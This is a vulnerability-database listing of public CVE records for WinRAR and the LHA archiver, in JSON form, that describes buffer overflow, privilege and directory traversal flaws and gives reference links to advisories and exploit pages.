All the vulnerabilites related to RARLAB - WinRAR
cve-2004-0234
Vulnerability from cvelistv5
Published
2004-05-05 04:00
Modified
2024-08-08 00:10
Severity ?
EPSS score ?
Summary
Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T00:10:03.930Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1015866",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1015866"
},
{
"name": "CLA-2004:840",
"tags": [
"vendor-advisory",
"x_refsource_CONECTIVA",
"x_transferred"
],
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"name": "5753",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/5753"
},
{
"name": "oval:org.mitre.oval:def:977",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL",
"x_transferred"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977"
},
{
"name": "FEDORA-2004-119",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
},
{
"name": "20060403 Barracuda LHA archiver security bug leads to remote compromise",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
},
{
"name": "10243",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/10243"
},
{
"name": "ADV-2006-1220",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/1220"
},
{
"name": "20040501 LHa buffer overflows and directory traversal problems",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
},
{
"name": "19514",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/19514"
},
{
"name": "5754",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/5754"
},
{
"name": "RHSA-2004:179",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt"
},
{
"name": "FLSA:1833",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"name": "DSA-515",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"name": "oval:org.mitre.oval:def:9881",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL",
"x_transferred"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881"
},
{
"name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"name": "GLSA-200405-02",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"name": "RHSA-2004:178",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
},
{
"name": "lha-multiple-bo(16012)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
},
{
"name": "20040502 Lha local stack overflow Proof Of Concept Code",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2004-04-30T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-10-10T00:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1015866",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1015866"
},
{
"name": "CLA-2004:840",
"tags": [
"vendor-advisory",
"x_refsource_CONECTIVA"
],
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"name": "5753",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/5753"
},
{
"name": "oval:org.mitre.oval:def:977",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977"
},
{
"name": "FEDORA-2004-119",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
},
{
"name": "20060403 Barracuda LHA archiver security bug leads to remote compromise",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
},
{
"name": "10243",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/10243"
},
{
"name": "ADV-2006-1220",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/1220"
},
{
"name": "20040501 LHa buffer overflows and directory traversal problems",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
},
{
"name": "19514",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/19514"
},
{
"name": "5754",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/5754"
},
{
"name": "RHSA-2004:179",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt"
},
{
"name": "FLSA:1833",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA"
],
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"name": "DSA-515",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"name": "oval:org.mitre.oval:def:9881",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881"
},
{
"name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"name": "GLSA-200405-02",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"name": "RHSA-2004:178",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
},
{
"name": "lha-multiple-bo(16012)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
},
{
"name": "20040502 Lha local stack overflow Proof Of Concept Code",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2004-0234",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1015866",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1015866"
},
{
"name": "CLA-2004:840",
"refsource": "CONECTIVA",
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"name": "5753",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/5753"
},
{
"name": "oval:org.mitre.oval:def:977",
"refsource": "OVAL",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A977"
},
{
"name": "FEDORA-2004-119",
"refsource": "FEDORA",
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
},
{
"name": "20060403 Barracuda LHA archiver security bug leads to remote compromise",
"refsource": "BUGTRAQ",
"url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
},
{
"name": "10243",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/10243"
},
{
"name": "ADV-2006-1220",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/1220"
},
{
"name": "20040501 LHa buffer overflows and directory traversal problems",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
},
{
"name": "19514",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/19514"
},
{
"name": "5754",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/5754"
},
{
"name": "RHSA-2004:179",
"refsource": "REDHAT",
"url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
},
{
"name": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt",
"refsource": "MISC",
"url": "http://www.guay-leroux.com/projects/barracuda-advisory-LHA.txt"
},
{
"name": "FLSA:1833",
"refsource": "FEDORA",
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"name": "DSA-515",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"name": "oval:org.mitre.oval:def:9881",
"refsource": "OVAL",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9881"
},
{
"name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"name": "GLSA-200405-02",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"name": "RHSA-2004:178",
"refsource": "REDHAT",
"url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
},
{
"name": "lha-multiple-bo(16012)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
},
{
"name": "20040502 Lha local stack overflow Proof Of Concept Code",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020778.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2004-0234",
"datePublished": "2004-05-05T04:00:00",
"dateReserved": "2004-03-17T00:00:00",
"dateUpdated": "2024-08-08T00:10:03.930Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2004-1254
Vulnerability from cvelistv5
Published
2004-12-22 05:00
Modified
2024-08-08 00:46
Severity ?
EPSS score ?
Summary
WinRAR 3.40, and possibly earlier versions, allows remote attackers to execute arbitrary code via a ZIP file containing a file with a long filename, possibly causing an integer overflow that leads to a buffer overflow.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.frsirt.com/exploits/20041217.Winrar.c.php | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/18569 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T00:46:12.321Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.frsirt.com/exploits/20041217.Winrar.c.php"
},
{
"name": "winrar-zip-file-bo(18569)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/18569"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2004-12-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "WinRAR 3.40, and possibly earlier versions, allows remote attackers to execute arbitrary code via a ZIP file containing a file with a long filename, possibly causing an integer overflow that leads to a buffer overflow."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-10T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.frsirt.com/exploits/20041217.Winrar.c.php"
},
{
"name": "winrar-zip-file-bo(18569)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/18569"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2004-1254",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "WinRAR 3.40, and possibly earlier versions, allows remote attackers to execute arbitrary code via a ZIP file containing a file with a long filename, possibly causing an integer overflow that leads to a buffer overflow."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.frsirt.com/exploits/20041217.Winrar.c.php",
"refsource": "MISC",
"url": "http://www.frsirt.com/exploits/20041217.Winrar.c.php"
},
{
"name": "winrar-zip-file-bo(18569)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/18569"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2004-1254",
"datePublished": "2004-12-22T05:00:00",
"dateReserved": "2004-12-20T00:00:00",
"dateUpdated": "2024-08-08T00:46:12.321Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2015-5663
Vulnerability from cvelistv5
Published
2015-12-30 02:00
Modified
2024-08-06 06:59
Severity ?
EPSS score ?
Summary
The file-execution functionality in WinRAR before 5.30 beta 5 allows local users to gain privileges via a Trojan horse file with a name similar to an extensionless filename that was selected by the user.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/79666 | vdb-entry, x_refsource_BID | |
| http://jvn.jp/en/jp/JVN64636058/index.html | third-party-advisory, x_refsource_JVN | |
| http://www.securitytracker.com/id/1034881 | vdb-entry, x_refsource_SECTRACK | |
| http://jvndb.jvn.jp/jvndb/JVNDB-2015-000199 | third-party-advisory, x_refsource_JVNDB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T06:59:03.484Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "79666",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/79666"
},
{
"name": "JVN#64636058",
"tags": [
"third-party-advisory",
"x_refsource_JVN",
"x_transferred"
],
"url": "http://jvn.jp/en/jp/JVN64636058/index.html"
},
{
"name": "1034881",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1034881"
},
{
"name": "JVNDB-2015-000199",
"tags": [
"third-party-advisory",
"x_refsource_JVNDB",
"x_transferred"
],
"url": "http://jvndb.jvn.jp/jvndb/JVNDB-2015-000199"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-12-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The file-execution functionality in WinRAR before 5.30 beta 5 allows local users to gain privileges via a Trojan horse file with a name similar to an extensionless filename that was selected by the user."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-12-02T20:57:01",
"orgId": "ede6fdc4-6654-4307-a26d-3331c018e2ce",
"shortName": "jpcert"
},
"references": [
{
"name": "79666",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/79666"
},
{
"name": "JVN#64636058",
"tags": [
"third-party-advisory",
"x_refsource_JVN"
],
"url": "http://jvn.jp/en/jp/JVN64636058/index.html"
},
{
"name": "1034881",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1034881"
},
{
"name": "JVNDB-2015-000199",
"tags": [
"third-party-advisory",
"x_refsource_JVNDB"
],
"url": "http://jvndb.jvn.jp/jvndb/JVNDB-2015-000199"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "vultures@jpcert.or.jp",
"ID": "CVE-2015-5663",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The file-execution functionality in WinRAR before 5.30 beta 5 allows local users to gain privileges via a Trojan horse file with a name similar to an extensionless filename that was selected by the user."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "79666",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/79666"
},
{
"name": "JVN#64636058",
"refsource": "JVN",
"url": "http://jvn.jp/en/jp/JVN64636058/index.html"
},
{
"name": "1034881",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1034881"
},
{
"name": "JVNDB-2015-000199",
"refsource": "JVNDB",
"url": "http://jvndb.jvn.jp/jvndb/JVNDB-2015-000199"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "ede6fdc4-6654-4307-a26d-3331c018e2ce",
"assignerShortName": "jpcert",
"cveId": "CVE-2015-5663",
"datePublished": "2015-12-30T02:00:00",
"dateReserved": "2015-07-24T00:00:00",
"dateUpdated": "2024-08-06T06:59:03.484Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2005-4620
Vulnerability from cvelistv5
Published
2006-01-06 11:00
Modified
2024-08-07 23:53
Severity ?
EPSS score ?
Summary
Buffer overflow in WinRAR 3.50 and earlier allows local users to execute arbitrary code via a long command-line argument. NOTE: because this program executes with the privileges of the invoking user, and because remote programs do not normally have the ability to specify a command-line argument for this program, there may not be a typical attack vector for the issue that crosses privilege boundaries. Therefore this may not be a vulnerability.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/archive/1/420679/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.rarlab.com/rarnew.htm | x_refsource_MISC | |
| http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c | x_refsource_MISC | |
| http://www.securityfocus.com/bid/15123 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T23:53:27.892Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20060103 Winrar 3.30 Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/420679/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.rarlab.com/rarnew.htm"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c"
},
{
"name": "15123",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/15123"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-10-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in WinRAR 3.50 and earlier allows local users to execute arbitrary code via a long command-line argument. NOTE: because this program executes with the privileges of the invoking user, and because remote programs do not normally have the ability to specify a command-line argument for this program, there may not be a typical attack vector for the issue that crosses privilege boundaries. Therefore this may not be a vulnerability."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-19T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20060103 Winrar 3.30 Local Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/420679/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.rarlab.com/rarnew.htm"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c"
},
{
"name": "15123",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/15123"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-4620",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in WinRAR 3.50 and earlier allows local users to execute arbitrary code via a long command-line argument. NOTE: because this program executes with the privileges of the invoking user, and because remote programs do not normally have the ability to specify a command-line argument for this program, there may not be a typical attack vector for the issue that crosses privilege boundaries. Therefore this may not be a vulnerability."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20060103 Winrar 3.30 Local Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/420679/100/0/threaded"
},
{
"name": "http://www.rarlab.com/rarnew.htm",
"refsource": "MISC",
"url": "http://www.rarlab.com/rarnew.htm"
},
{
"name": "http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c",
"refsource": "MISC",
"url": "http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c"
},
{
"name": "15123",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/15123"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-4620",
"datePublished": "2006-01-06T11:00:00",
"dateReserved": "2006-01-06T00:00:00",
"dateUpdated": "2024-08-07T23:53:27.892Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2005-0331
Vulnerability from cvelistv5
Published
2005-02-10 05:00
Modified
2024-08-07 21:13
Severity ?
EPSS score ?
Summary
Directory traversal vulnerability in WinRAR 3.42 and earlier, when the user clicks on the ZIP file to extract it, allows remote attackers to create arbitrary files via a ... (triple dot) in the filename of the ZIP file.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/12422 | vdb-entry, x_refsource_BID | |
| http://marc.info/?l=bugtraq&m=110737609604210&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/20585 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T21:13:54.041Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "12422",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/12422"
},
{
"name": "20050202 7a69Adv#21 - WinRAR unpack one-folder path disclosure",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=110737609604210\u0026w=2"
},
{
"name": "winrar-dotdotdotdirectory-traversal(20585)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/20585"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-02-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in WinRAR 3.42 and earlier, when the user clicks on the ZIP file to extract it, allows remote attackers to create arbitrary files via a ... (triple dot) in the filename of the ZIP file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-10T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "12422",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/12422"
},
{
"name": "20050202 7a69Adv#21 - WinRAR unpack one-folder path disclosure",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=110737609604210\u0026w=2"
},
{
"name": "winrar-dotdotdotdirectory-traversal(20585)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/20585"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-0331",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability in WinRAR 3.42 and earlier, when the user clicks on the ZIP file to extract it, allows remote attackers to create arbitrary files via a ... (triple dot) in the filename of the ZIP file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "12422",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/12422"
},
{
"name": "20050202 7a69Adv#21 - WinRAR unpack one-folder path disclosure",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=110737609604210\u0026w=2"
},
{
"name": "winrar-dotdotdotdirectory-traversal(20585)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/20585"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-0331",
"datePublished": "2005-02-10T05:00:00",
"dateReserved": "2005-02-10T00:00:00",
